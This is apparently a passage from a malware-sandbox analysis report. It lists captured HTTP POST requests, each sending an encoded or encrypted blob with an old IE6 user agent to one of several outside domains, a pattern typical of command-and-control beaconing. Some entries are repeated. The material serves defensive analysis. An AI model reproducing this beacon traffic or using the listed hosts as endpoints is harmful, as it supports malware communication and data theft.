              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 59 67 4a 39 7a 4b 4e 6a 77 38 72 5a 71 44 63 78 4b 76 54 34 48 4d 79 42 77 38 72 4a 4f 75 56 4e 68 33 4f 58 70 53 43 39 50 37 44 66 4e 30 66 44 58 6f 36 47 4e 79 6b 58 32 75 62 66 61 30 66 43 53 5a 6d 74 33 69 70 53 65 48 33 49 64 76 6a 45 54 65 49 71 67 4b 45 76 71 4c 62 74 49 33 59 66 56 54 42 43 74 2b 6f 4a 50 48 4a 67 70 65 47 62 35 42 68 35 63 4d 44 6b 50 4d 4a 75 58 4f 69 6f 6f 76 30 43 48 37 37 37 33 6a 73 55 34 4d 64 4c 45 58 35 70 56 4b 76 65 52 44 56 4f 62 61 43 4e 77 34 4c 72 69 66 43 34 44 36 43 6b 45 35 2f 55 50 77 71 57 6b 66 33 4f 78 4a 56 50 6a 38 74 74 4a 54 6a 58 61 42 49 48 64 38 6e 4e 61 4a 6e 68 71 61 2b 6d 32 50 5a 49 57 45 39 34 44 43 41 34 6f 4c 39 33 38 51 45 78 41 55 76 77 37 66 51 4c 43 4d 68 55 45 30 79 77 37 71 79 48 66 68 49 74 36 46 76 67 39 65 59 50 6c 6d 4e 61 6d 46 50 37 4c 6a 76 54 34 4c 4d 37 65 38 37 64 39 75 46 67 38 73 53 7a 55 58 51 4e 59 2b 48 6a 46 62 4a 75 54 39 6f 4a 33 47 38 57 76 74 4d 67 44 4b 6b 4a 5a 39 79 52 31 72 44 74 61 4c 4d 41 71 71 6f 48 36 4f 46 6c 6b 74 63 75 2b 4e 34 79 51 4c 63 34 49 48 36 34 48 34 5a 33 5a 61 71 72 53 36 51 56 34 41 69 57 6e 78 6b 6c 38 41 38 6f 55 64 59 35 2f 4a 74 6c 50 41 59 56 74 61 55 38 2f 64 52 6b 30 34 56 44 58 59 4e 55 65 54 75 67 46 49 52 70 62 53 54 73 6c 75 65 4e 32 58 43 34 4e 7a 53 51 5a 61 35 4d 4b 73 2f 6d 44 52 6e 61 6f 35 38 4b 46 72 63 79 42 56 62 30 6f 6b 31 78 59 4d 68 36 37 57 51 35 6d 76 47 50 4c 69 63 6e 37 6b 49 47 69 64 47 6c 30 5a 71 57 71 43 78 67 75 6a 5a 61 33 37 69 6c 35 65 34 4a 62 71 6f 58 63 6a 66 66 49 35 7a 79 6e 48 41 4a 48 6d 31 71 7a 59 63 6b 7a 55 4f 39 42 65 54 54 57 79 76 4f 77 49 69 6d 36 53 48 78 50 39 37 71 48 77 3d 3d Data Ascii: YgJ9zKNjw8rZqDcxKvT4HMyBw8rJOuVNh3OXpSC9P7DfN0fDXo6GNykX2ubfa0fCSZmt3ipSeH3IdvjETeIqgKEvqLbtI3YfVTBCt+oJPHJgpeGb5Bh5cMDkPMJuXOioov0CH7773jsU4MdLEX5pVKveRDVObaCNw4LrifC4D6CkE5/UPwqWkf3OxJVPj8ttJTjXaBIHd8nNaJnhqa+m2PZIWE94DCA4oL938QExAUvw7fQLCMhUE0yw7qyHfhIt6Fvg9eYPlmNamFP7LjvT4LM7e87d9uFg8sSzUXQNY+HjFbJuT9oJ3G8WvtMgDKkJZ9yR1rDtaLMAqqoH6OFlktcu+N4yQLc4IH64H4Z3ZaqrS6QV4AiWnxkl8A8oUdY5/JtlPAYVtaU8/dRk04VDXYNUeTugFIRpbSTslueN2XC4NzSQZa5MKs/mDRnao58KFrcyBVb0ok1xYMh67WQ5mvGPLicn7kIGidGl0ZqWqCxgujZa37il5e4JbqoXcjffI5zynHAJHm1qzYckzUO9BeTTWyvOwIim6SHxP97qHw==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 70 41 4b 64 39 32 63 61 7a 63 6f 5a 67 51 77 33 46 6c 52 74 31 54 43 5a 75 2b 58 64 4d 70 54 4f 69 35 79 6e 74 55 74 6a 37 45 49 76 53 4f 7a 75 53 38 4e 69 37 56 4f 42 70 69 36 55 32 66 62 50 69 6e 65 4f 38 4d 7a 71 35 68 32 32 79 6d 2f 50 6f 6d 65 4c 6e 56 6a 7a 68 71 39 67 6c 4a 61 38 2b 5a 6c 49 52 4c 76 72 64 58 49 6c 46 56 6f 72 46 4d 50 30 79 61 53 2b 46 30 31 2b 65 39 50 77 36 7a 49 54 65 52 38 7a 46 71 73 31 77 44 61 77 32 57 70 6e 30 43 64 62 30 5a 70 39 32 39 33 7a 5a 75 71 68 58 55 2b 77 69 4c 56 6f 45 36 6a 63 36 45 6e 37 6e 52 72 45 50 59 67 4b 30 4c 76 66 43 4e 36 76 42 34 2f 4e 70 72 44 71 33 53 4b 37 55 6a 6a 33 53 46 4c 34 7a 38 57 6b 4e 34 6e 53 78 43 56 33 43 6a 39 64 6e 79 79 78 2b 71 32 68 47 56 64 37 4f 65 33 58 57 63 61 62 69 41 54 4c 6e 2b 41 48 65 72 62 4a 59 64 4e 66 51 77 44 67 41 2b 54 7a 6e 70 62 73 6f 57 63 31 63 56 49 35 72 6b 4d 42 6a 78 76 78 62 6e 75 69 36 48 63 32 59 55 75 62 76 6f 32 4b 67 58 6f 36 68 6f 72 4b 79 69 73 4b 4d 6b 63 31 5a 45 6f 4c 31 2f 4f 65 73 54 6c 69 59 57 46 4c 41 35 37 44 38 32 69 71 37 31 4b 76 2b 76 37 74 70 72 77 73 4c 35 4c 31 72 62 38 59 66 6e 57 43 33 54 38 44 7a 61 61 7a 68 35 70 65 51 57 4d 58 30 4d 69 68 33 45 4c 4d 77 61 68 4b 58 76 45 4a 65 37 4c 32 76 59 5a 49 77 6c 36 45 69 30 79 6e 4d 4d 6b 47 6e 51 72 4e 54 78 55 46 45 2b 42 38 44 46 56 64 4a 78 53 50 71 73 73 36 66 4b 64 6d 46 2f 75 33 5a 61 4f 49 6e 75 76 45 42 64 44 4c 4e 36 6c 72 6c 53 33 6b 66 6a 41 62 53 35 57 49 53 53 69 67 30 78 34 31 2f 73 59 46 6d 75 36 62 37 70 54 66 48 38 2b 50 38 78 63 74 76 4a 56 43 6e 37 41 63 48 44 62 75 69 62 4d 67 36 6c 59 6b 2f 56 57 56 76 65 6e 34 52 68 65 44 4f 63 6d 58 4b 48 48 75 68 4d 61 44 72 65 63 49 6f 48 48 32 78 51 6d 78 32 61 6d 52 Data Ascii: pAKd92cazcoZgQw3FlRt1TCZu+XdMpTOi5yntUtj7EIvSOzuS8Ni7VOBpi6U2fbPineO8Mzq5h22ym/PomeLnVjzhq9glJa8+ZlIRLvrdXIlFVorFMP0yaS+F01+e9Pw6zITeR8zFqs1wDaw2Wpn0Cdb0Zp9293zZuqhXU+wiLVoE6jc6En7nRrEPYgK0LvfCN6vB4/NprDq3SK7Ujj3SFL4z8WkN4nSxCV3Cj9dnyyx+q2hGVd7Oe3XWcabiATLn+AHerbJYdNfQwDgA+TznpbsoWc1cVI5rkMBjxvxbnui6Hc2YUubvo2KgXo6horKyisKMkc1ZEoL1/OesTliYWFLA57D82iq71Kv+v7tprwsL5L1rb8YfnWC3T8Dzaazh5peQWMX0Mih3ELMwahKXvEJe7L2vYZIwl6Ei0ynMMkGnQrNTxUFE+B8DFVdJxSPqss6fKdmF/u3ZaOInuvEBdDLN6lrlS3kfjAbS5WISSig0x41/sYFmu6b7pTfH8+P8xctvJVCn7AcHDbuibMg6lYk/VWVven4RheDOcmXKHHuhMaDrecIoHH2xQmx2amR
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 50 61 30 53 33 6f 76 6d 33 4d 72 43 79 71 30 41 34 67 6f 56 45 66 52 4d 5a 6f 48 52 2b 77 4e 49 37 2f 44 53 77 45 76 73 36 6b 41 6b 7a 31 37 54 32 6f 6d 4e 6f 75 70 4f 6e 71 65 31 62 54 30 76 73 51 67 79 4d 6d 38 4f 4b 69 41 75 35 56 43 68 30 70 48 77 51 35 72 49 50 69 56 62 6c 6e 63 54 62 38 6f 44 79 68 78 79 6a 69 78 74 58 4c 4e 6b 54 56 7a 47 33 79 35 6b 32 61 33 77 31 51 6c 69 75 70 68 74 2b 6b 55 64 31 56 2b 43 56 6c 59 77 70 55 39 5a 4e 77 51 78 54 6a 57 69 4c 73 43 72 32 75 4f 34 63 6e 5a 59 62 50 58 36 47 6f 41 75 50 42 50 70 56 45 54 59 4a 4c 74 79 79 54 48 39 6f 4c 30 36 47 71 56 48 71 4d 2f 50 33 32 2b 79 37 6d 59 79 79 6f 57 49 69 30 79 51 45 79 6e 36 51 58 4f 47 2f 36 5a 43 42 41 31 77 35 46 36 38 31 45 47 79 6b 59 73 61 64 6f 61 78 33 78 4c 68 52 52 74 34 54 4a 72 39 35 30 73 74 4e 57 75 4f 71 37 4b 4b 4a 59 74 5a 38 37 42 32 63 45 30 4a 4f 4e 56 68 71 62 35 75 78 58 4a 74 4d 47 6a 6d 73 35 45 59 79 62 62 33 68 65 4d 37 4f 65 38 45 4a 30 2f 6f 2b 53 69 76 33 79 4c 6c 61 49 2f 32 77 69 4b 54 35 54 38 4d 44 47 32 46 71 5a 55 2b 45 2b 6e 64 79 50 72 73 6b 75 54 31 2f 74 55 71 2b 66 68 39 41 7a 6e 33 38 77 63 39 50 55 64 51 68 72 4a 75 45 43 73 6c 74 55 39 48 76 59 77 64 78 6a 4f 46 74 6b 44 64 6e 2f 59 30 42 61 77 52 38 61 71 35 62 6c 58 6d 71 57 6b 77 42 71 4e 63 71 75 50 4d 6e 4b 44 46 75 38 70 4a 77 75 37 75 54 37 36 49 31 79 4e 58 46 41 36 47 59 69 54 43 68 45 38 37 56 56 77 62 67 74 2b 44 47 55 71 76 4b 34 51 65 69 47 2b 41 74 42 50 56 68 66 6b 69 74 31 31 43 4a 2f 42 59 33 4a 32 38 46 69 4f 73 48 70 51 36 66 69 41 72 45 41 49 4f 4e 54 37 58 73 2f 6c 58 75 61 6d 59 6b 67 4c 7a 41 68 51 78 30 4c 65 79 35 56 64 52 47 58 2b 35 2b 68 47 71 4e 5a 78 48 5a 41 7a 46 39 4c 48 2b 50 6d 78 68 5a 65 35 44 62 46 61 50 Data Ascii: Pa0S3ovm3MrCyq0A4goVEfRMZoHR+wNI7/DSwEvs6kAkz17T2omNoupOnqe1bT0vsQgyMm8OKiAu5VCh0pHwQ5rIPiVblncTb8oDyhxyjixtXLNkTVzG3y5k2a3w1Qliupht+kUd1V+CVlYwpU9ZNwQxTjWiLsCr2uO4cnZYbPX6GoAuPBPpVETYJLtyyTH9oL06GqVHqM/P32+y7mYyyoWIi0yQEyn6QXOG/6ZCBA1w5F681EGykYsadoax3xLhRRt4TJr950stNWuOq7KKJYtZ87B2cE0JONVhqb5uxXJtMGjms5EYybb3heM7Oe8EJ0/o+Siv3yLlaI/2wiKT5T8MDG2FqZU+E+ndyPrskuT1/tUq+fh9Azn38wc9PUdQhrJuECsltU9HvYwdxjOFtkDdn/Y0BawR8aq5blXmqWkwBqNcquPMnKDFu8pJwu7uT76I1yNXFA6GYiTChE87VVwbgt+DGUqvK4QeiG+AtBPVhfkit11CJ/BY3J28FiOsHpQ6fiArEAIONT7Xs/lXuamYkgLzAhQx0Ley5VdRGX+5+hGqNZxHZAzF9LH+PmxhZe5DbFaP
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 4e 31 63 44 31 66 35 4b 31 4d 6f 32 54 62 38 55 79 66 62 6c 63 65 48 77 2b 4c 47 2b 34 4c 67 75 45 6c 76 77 66 41 43 57 38 4c 31 73 6c 66 71 4a 77 69 77 52 43 67 6b 31 4e 55 43 70 66 65 55 32 34 49 62 41 71 47 6d 4b 4b 54 52 74 66 68 4a 6a 72 79 78 6f 46 33 37 2f 55 49 76 54 7a 32 36 4d 6e 32 58 43 77 59 51 30 42 35 55 64 58 63 65 75 58 46 4b 67 46 53 53 39 33 57 7a 6a 6c 65 70 75 68 44 6d 4c 30 66 54 30 65 5a 6c 2b 36 53 49 6b 6d 4b 38 35 52 31 70 63 78 6e 6d 33 4d 68 7a 67 34 62 43 4e 62 46 6e 55 74 59 39 32 2f 39 44 38 67 46 79 31 38 70 62 79 69 74 59 7a 71 6e 45 39 42 41 70 54 62 59 6f 71 74 4e 75 30 62 49 4f 77 31 56 66 33 4a 64 72 6c 54 69 61 62 38 76 71 37 4b 6a 66 55 76 44 6f 58 38 50 6c 72 6c 4b 6e 69 51 38 6b 6b 58 32 35 48 62 6b 53 30 72 7a 74 6f 65 30 4e 66 43 6e 46 58 37 30 36 42 30 35 52 44 38 79 38 61 6d 67 64 62 42 4c 6b 63 45 48 56 5a 4e 78 74 45 64 47 33 51 48 5a 31 69 38 35 6a 36 4e 6a 65 4d 74 6c 59 6e 38 59 64 37 58 4a 59 77 4b 42 72 4b 77 44 79 6e 64 74 62 51 58 50 38 50 43 69 57 63 48 6f 70 70 71 51 71 48 6d 59 53 77 72 57 66 51 51 32 5a 51 6b 71 6e 7a 43 6e 41 36 74 38 68 30 45 75 6b 30 43 61 57 45 52 37 2b 76 73 51 35 67 64 37 50 56 69 61 48 44 56 6f 51 79 7a 47 54 4d 4f 37 4a 34 55 43 37 4d 57 45 78 57 41 4f 63 4a 43 6d 34 58 62 6b 74 5a 50 7a 78 73 4f 36 6a 58 54 53 78 56 66 5a 4e 67 4c 46 74 61 50 41 66 30 6b 4d 6c 46 79 57 6d 53 50 31 47 49 4e 61 42 54 71 50 6c 4e 50 39 7a 64 58 37 54 41 36 57 2f 78 75 56 4e 33 61 32 52 6e 33 44 62 31 62 6d 32 4b 78 75 45 38 30 56 4d 4d 43 4c 58 41 70 75 43 58 75 38 53 4d 62 6d 59 2f 73 6e 77 6b 6c 7a 32 72 64 31 43 48 67 33 52 51 43 4f 38 4e 39 51 3d 3d Data Ascii: N1cD1f5K1Mo2Tb8UyfblceHw+LG+4LguElvwfACW8L1slfqJwiwRCgk1NUCpfeU24IbAqGmKKTRtfhJjryxoF37/UIvTz26Mn2XCwYQ0B5UdXceuXFKgFSS93WzjlepuhDmL0fT0eZl+6SIkmK85R1pcxnm3Mhzg4bCNbFnUtY92/9D8gFy18pbyitYzqnE9BApTbYoqtNu0bIOw1Vf3JdrlTiab8vq7KjfUvDoX8PlrlKniQ8kkX25HbkS0rztoe0NfCnFX706B05RD8y8amgdbBLkcEHVZNxtEdG3QHZ1i85j6NjeMtlYn8Yd7XJYwKBrKwDyndtbQXP8PCiWcHoppqQqHmYSwrWfQQ2ZQkqnzCnA6t8h0Euk0CaWER7+vsQ5gd7PViaHDVoQyzGTMO7J4UC7MWExWAOcJCm4XbktZPzxsO6jXTSxVfZNgLFtaPAf0kMlFyWmSP1GINaBTqPlNP9zdX7TA6W/xuVN3a2Rn3Db1bm2KxuE80VMMCLXApuCXu8SMbmY/snwklz2rd1CHg3RQCO8N9Q==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.item-pr.comCache-Control: no-cacheData Raw: 5a 72 5a 44 36 68 39 49 4b 38 69 4d 4b 36 74 38 66 76 5a 6b 73 4b 6a 72 6c 59 6e 31 54 71 62 46 77 34 45 34 52 32 4c 64 67 79 62 46 58 54 43 70 43 43 4a 30 51 45 31 72 36 66 32 39 64 66 68 31 70 75 78 48 39 58 6e 46 4c 59 4e 39 49 63 32 76 43 30 48 52 4c 36 76 6a 75 57 76 30 4a 53 49 37 79 4f 70 51 57 38 56 35 65 4c 71 4b 4d 6b 6d 57 41 4b 64 73 57 58 6d 61 61 43 75 63 71 73 79 71 78 51 6a 47 41 62 4f 55 58 37 4f 52 33 41 33 4b 49 63 76 59 64 5a 34 4e 6e 77 5a 4f 46 51 38 64 72 4a 59 4e 39 5a 64 73 68 6c 43 6a 39 79 6a 75 4a 53 6d 5a 74 41 33 6d 36 2b 75 58 44 53 5a 6c 79 42 6d 46 51 5a 37 48 53 66 2f 68 51 30 37 67 68 74 4b 35 57 63 2f 33 61 44 66 58 48 2f 74 65 30 4d 6b 6e 69 64 66 73 75 4d 51 43 6d 47 4c 64 52 62 66 5a 64 75 43 7a 56 57 54 54 77 48 34 6c 37 67 54 2b 55 34 4d 6b 68 47 73 5a 75 61 69 51 45 46 7a 4c 46 65 2f 61 65 67 6d 74 51 72 36 33 52 34 50 5a 4f 74 72 67 49 4b 4f 57 5a 55 63 52 6c 6f 6f 75 57 73 36 62 30 73 6a 4d 65 68 57 2f 72 4e 47 73 6a 37 4a 59 7a 33 6c 37 69 6b 6f 71 74 7a 43 36 65 74 51 67 32 30 2f 2f 58 78 36 31 7a 54 48 4c 55 77 49 79 72 36 5a 2b 68 6f 77 37 4f 51 76 57 34 52 69 54 4a 37 72 6b 64 38 75 56 77 37 34 2b 64 71 41 46 73 6a 6f 73 49 79 68 62 79 37 43 68 6d 69 48 35 2f 64 2b 48 30 4d 47 6b 4a 45 57 48 6e 75 58 42 5a 62 39 45 39 58 78 73 72 42 77 6c 64 63 4f 57 6c 6c 50 78 77 2b 78 6b 63 47 61 43 67 59 59 6f 38 30 63 4c 79 38 34 6f 44 65 41 5a 30 5a 73 6e 41 63 35 73 4e 7a 65 42 52 45 39 46 52 43 62 44 51 30 56 32 6d 44 78 57 56 33 72 38 54 44 31 6d 56 34 48 78 61 39 47 2b 46 44 4e 34 6c 4c 4d 5a 58 44 64 58 72 41 55 45 Data Ascii: ZrZD6h9IK8iMK6t8fvZksKjrlYn1TqbFw4E4R2LdgybFXTCpCCJ0QE1r6f29dfh1puxH9XnFLYN9Ic2vC0HRL6vjuWv0JSI7yOpQW8V5eLqKMkmWAKdsWXmaaCucqsyqxQjGAbOUX7OR3A3KIcvYdZ4NnwZOFQ8drJYN9ZdshlCj9yjuJSmZtA3m6+uXDSZlyBmFQZ7HSf/hQ07ghtK5Wc/3aDfXH/te0MknidfsuMQCmGLdRbfZduCzVWTTwH4l7gT+U4MkhGsZuaiQEFzLFe/aegmtQr63R4PZOtrgIKOWZUcRloouWs6b0sjMehW/rNGsj7JYz3l7ikoqtzC6etQg20//Xx61zTHLUwIyr6Z+how7OQvW4RiTJ7rkd8uVw74+dqAFsjosIyhby7ChmiH5/d+H0MGkJEWHnuXBZb9E9XxsrBwldcOWllPxw+xkcGaCgYYo80cLy84oDeAZ0ZsnAc5sNzeBRE9FRCbDQ0V2mDxWV3r8TD1mV4Hxa9G+FDN4lLMZXDdXrAUE
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 50 61 30 53 33 6f 76 6d 33 4d 72 43 79 71 30 41 34 67 6f 56 45 66 52 4d 5a 6f 48 52 2b 77 4e 49 37 2f 44 53 77 45 76 73 36 6b 41 6b 7a 31 37 54 32 6f 6d 4e 6f 75 70 4f 6e 71 65 31 62 54 30 76 73 51 67 79 4d 6d 38 4f 4b 69 41 75 35 56 43 68 30 70 48 77 51 35 72 49 50 69 56 62 6c 6e 63 54 62 38 6f 44 79 68 78 79 6a 69 78 74 58 4c 4e 6b 54 56 7a 47 33 79 35 6b 32 61 33 77 31 51 6c 69 75 70 68 74 2b 6b 55 64 31 56 2b 43 56 6c 59 77 70 55 39 5a 4e 77 51 78 54 6a 57 69 4c 73 43 72 32 75 4f 34 63 6e 5a 59 62 50 58 36 47 6f 41 75 50 42 50 70 56 45 54 59 4a 4c 74 79 79 54 48 39 6f 4c 30 36 47 71 56 48 71 4d 2f 50 33 32 2b 79 37 6d 59 79 79 6f 57 49 69 30 79 51 45 79 6e 36 51 58 4f 47 2f 36 5a 43 42 41 31 77 35 46 36 38 31 45 47 79 6b 59 73 61 64 6f 61 78 33 78 4c 68 52 52 74 34 54 4a 72 39 35 30 73 74 4e 57 75 4f 71 37 4b 4b 4a 59 74 5a 38 37 42 32 63 45 30 4a 4f 4e 56 68 71 62 35 75 78 58 4a 74 4d 47 6a 6d 73 35 45 59 79 62 62 33 68 65 4d 37 4f 65 38 45 4a 30 2f 6f 2b 53 69 76 33 79 4c 6c 61 49 2f 32 77 69 4b 54 35 54 38 4d 44 47 32 46 71 5a 55 2b 45 2b 6e 64 79 50 72 73 6b 75 54 31 2f 74 55 71 2b 66 68 39 41 7a 6e 33 38 77 63 39 50 55 64 51 68 72 4a 75 45 43 73 6c 74 55 39 48 76 59 77 64 78 6a 4f 46 74 6b 44 64 6e 2f 59 30 42 61 77 52 38 61 71 35 62 6c 58 6d 71 57 6b 77 42 71 4e 63 71 75 50 4d 6e 4b 44 46 75 38 70 4a 77 75 37 75 54 37 36 49 31 79 4e 58 46 41 36 47 59 69 54 43 68 45 38 37 56 56 77 62 67 74 2b 44 47 55 71 76 4b 34 51 65 69 47 2b 41 74 42 50 56 68 66 6b 69 74 31 31 43 4a 2f 42 59 33 4a 32 38 46 69 4f 73 48 70 51 36 66 69 41 72 45 41 49 4f 4e 54 37 58 73 2f 6c 58 75 61 6d 59 6b 67 4c 7a 41 68 51 78 30 4c 65 79 35 56 64 52 47 58 2b 35 2b 68 47 71 4e 5a 78 48 5a 41 7a 46 39 4c 48 2b 50 6d 78 68 5a 65 35 44 62 46 61 50 Data Ascii: Pa0S3ovm3MrCyq0A4goVEfRMZoHR+wNI7/DSwEvs6kAkz17T2omNoupOnqe1bT0vsQgyMm8OKiAu5VCh0pHwQ5rIPiVblncTb8oDyhxyjixtXLNkTVzG3y5k2a3w1Qliupht+kUd1V+CVlYwpU9ZNwQxTjWiLsCr2uO4cnZYbPX6GoAuPBPpVETYJLtyyTH9oL06GqVHqM/P32+y7mYyyoWIi0yQEyn6QXOG/6ZCBA1w5F681EGykYsadoax3xLhRRt4TJr950stNWuOq7KKJYtZ87B2cE0JONVhqb5uxXJtMGjms5EYybb3heM7Oe8EJ0/o+Siv3yLlaI/2wiKT5T8MDG2FqZU+E+ndyPrskuT1/tUq+fh9Azn38wc9PUdQhrJuECsltU9HvYwdxjOFtkDdn/Y0BawR8aq5blXmqWkwBqNcquPMnKDFu8pJwu7uT76I1yNXFA6GYiTChE87VVwbgt+DGUqvK4QeiG+AtBPVhfkit11CJ/BY3J28FiOsHpQ6fiArEAIONT7Xs/lXuamYkgLzAhQx0Ley5VdRGX+5+hGqNZxHZAzF9LH+PmxhZe5DbFaP
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 4e 31 63 44 31 66 35 4b 31 4d 6f 32 54 62 38 55 79 66 62 6c 63 65 48 77 2b 4c 47 2b 34 4c 67 75 45 6c 76 77 66 41 43 57 38 4c 31 73 6c 66 71 4a 77 69 77 52 43 67 6b 31 4e 55 43 70 66 65 55 32 34 49 62 41 71 47 6d 4b 4b 54 52 74 66 68 4a 6a 72 79 78 6f 46 33 37 2f 55 49 76 54 7a 32 36 4d 6e 32 58 43 77 59 51 30 42 35 55 64 58 63 65 75 58 46 4b 67 46 53 53 39 33 57 7a 6a 6c 65 70 75 68 44 6d 4c 30 66 54 30 65 5a 6c 2b 36 53 49 6b 6d 4b 38 35 52 31 70 63 78 6e 6d 33 4d 68 7a 67 34 62 43 4e 62 46 6e 55 74 59 39 32 2f 39 44 38 67 46 79 31 38 70 62 79 69 74 59 7a 71 6e 45 39 42 41 70 54 62 59 6f 71 74 4e 75 30 62 49 4f 77 31 56 66 33 4a 64 72 6c 54 69 61 62 38 76 71 37 4b 6a 66 55 76 44 6f 58 38 50 6c 72 6c 4b 6e 69 51 38 6b 6b 58 32 35 48 62 6b 53 30 72 7a 74 6f 65 30 4e 66 43 6e 46 58 37 30 36 42 30 35 52 44 38 79 38 61 6d 67 64 62 42 4c 6b 63 45 48 56 5a 4e 78 74 45 64 47 33 51 48 5a 31 69 38 35 6a 36 4e 6a 65 4d 74 6c 59 6e 38 59 64 37 58 4a 59 77 4b 42 72 4b 77 44 79 6e 64 74 62 51 58 50 38 50 43 69 57 63 48 6f 70 70 71 51 71 48 6d 59 53 77 72 57 66 51 51 32 5a 51 6b 71 6e 7a 43 6e 41 36 74 38 68 30 45 75 6b 30 43 61 57 45 52 37 2b 76 73 51 35 67 64 37 50 56 69 61 48 44 56 6f 51 79 7a 47 54 4d 4f 37 4a 34 55 43 37 4d 57 45 78 57 41 4f 63 4a 43 6d 34 58 62 6b 74 5a 50 7a 78 73 4f 36 6a 58 54 53 78 56 66 5a 4e 67 4c 46 74 61 50 41 66 30 6b 4d 6c 46 79 57 6d 53 50 31 47 49 4e 61 42 54 71 50 6c 4e 50 39 7a 64 58 37 54 41 36 57 2f 78 75 56 4e 33 61 32 52 6e 33 44 62 31 62 6d 32 4b 78 75 45 38 30 56 4d 4d 43 4c 58 41 70 75 43 58 75 38 53 4d 62 6d 59 2f 73 6e 77 6b 6c 7a 32 72 64 31 43 48 67 33 52 51 43 4f 38 4e 39 51 3d 3d Data Ascii: N1cD1f5K1Mo2Tb8UyfblceHw+LG+4LguElvwfACW8L1slfqJwiwRCgk1NUCpfeU24IbAqGmKKTRtfhJjryxoF37/UIvTz26Mn2XCwYQ0B5UdXceuXFKgFSS93WzjlepuhDmL0fT0eZl+6SIkmK85R1pcxnm3Mhzg4bCNbFnUtY92/9D8gFy18pbyitYzqnE9BApTbYoqtNu0bIOw1Vf3JdrlTiab8vq7KjfUvDoX8PlrlKniQ8kkX25HbkS0rztoe0NfCnFX706B05RD8y8amgdbBLkcEHVZNxtEdG3QHZ1i85j6NjeMtlYn8Yd7XJYwKBrKwDyndtbQXP8PCiWcHoppqQqHmYSwrWfQQ2ZQkqnzCnA6t8h0Euk0CaWER7+vsQ5gd7PViaHDVoQyzGTMO7J4UC7MWExWAOcJCm4XbktZPzxsO6jXTSxVfZNgLFtaPAf0kMlFyWmSP1GINaBTqPlNP9zdX7TA6W/xuVN3a2Rn3Db1bm2KxuE80VMMCLXApuCXu8SMbmY/snwklz2rd1CHg3RQCO8N9Q==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 4b 33 61 69 5a 6b 33 32 38 63 70 75 31 52 57 41 78 43 4e 67 41 41 5a 73 5a 77 47 37 4f 7a 56 44 30 65 75 71 45 76 4d 64 67 34 72 6c 33 76 6d 6c 34 58 69 63 52 61 6e 6c 73 36 43 34 33 37 30 49 53 69 54 79 77 71 43 4d 6e 6f 67 6c 74 38 46 69 73 64 6f 38 31 4a 6e 4c 35 62 62 62 61 32 46 74 62 73 4b 36 73 47 30 5a 6f 70 74 72 4b 4b 4a 43 4a 51 78 47 6f 36 2b 4c 63 36 65 45 42 35 44 77 30 76 56 79 49 57 6b 39 56 34 6d 67 55 4c 4d 69 4a 34 4e 76 41 53 43 53 4d 69 6d 50 4d 73 74 4f 59 4f 48 67 71 2f 55 44 65 38 34 76 72 41 66 76 68 35 55 45 68 4f 72 77 61 4d 78 4d 6c 4e 37 47 55 79 31 55 56 6b 56 67 65 35 61 53 53 42 7a 30 78 4e 68 77 41 76 46 42 50 2b 6c 4c 53 34 63 62 34 58 43 63 42 6a 63 49 4a 4b 6e 7a 46 6b 72 62 2f 66 32 48 35 6c 62 46 38 45 6d 34 64 79 38 53 4a 59 76 51 38 51 6b 6b 68 4b 4c 7a 74 50 59 33 61 63 55 35 75 6e 36 46 48 35 43 49 69 32 2b 47 46 5a 4e 55 56 77 6e 45 33 6a 67 69 4c 2f 6a 4e 36 34 2b 71 37 66 6a 45 4b 38 50 56 39 33 43 45 78 75 78 5a 69 44 6e 37 69 6c 56 4d 32 4d 6d 6e 63 42 4c 4e 74 73 61 36 36 38 44 48 71 6c 76 58 67 68 74 2f 54 5a 31 6b 57 4b 6e 33 35 78 73 57 43 44 2f 76 37 4b 51 35 79 4c 49 50 76 4f 49 4b 70 6d 72 48 74 2f 34 4c 74 49 5a 5a 34 75 76 6d 67 46 2f 58 58 53 38 7a 39 34 75 6a 50 57 46 64 78 30 4a 74 6d 50 79 45 43 44 71 6a 44 49 50 46 51 53 69 54 2f 59 53 6a 6c 64 68 67 57 35 44 46 66 73 50 36 67 35 38 61 5a 31 4d 71 42 59 76 35 38 56 73 61 4f 30 4b 5a 79 43 73 67 56 70 7a 4d 4a 35 6d 68 44 62 53 58 67 33 6f 43 58 54 68 31 47 58 39 41 44 76 75 2b 64 6d 74 31 34 38 4e 78 6b 47 6f 31 68 74 64 67 47 68 66 64 4b 6d 61 2f 4b 74 72 4e 35 52 71 73 31 71 30 57 70 4a 62 64 72 78 69 4f 63 65 54 56 36 73 57 68 78 73 6d 54 31 41 3d 3d Data Ascii: 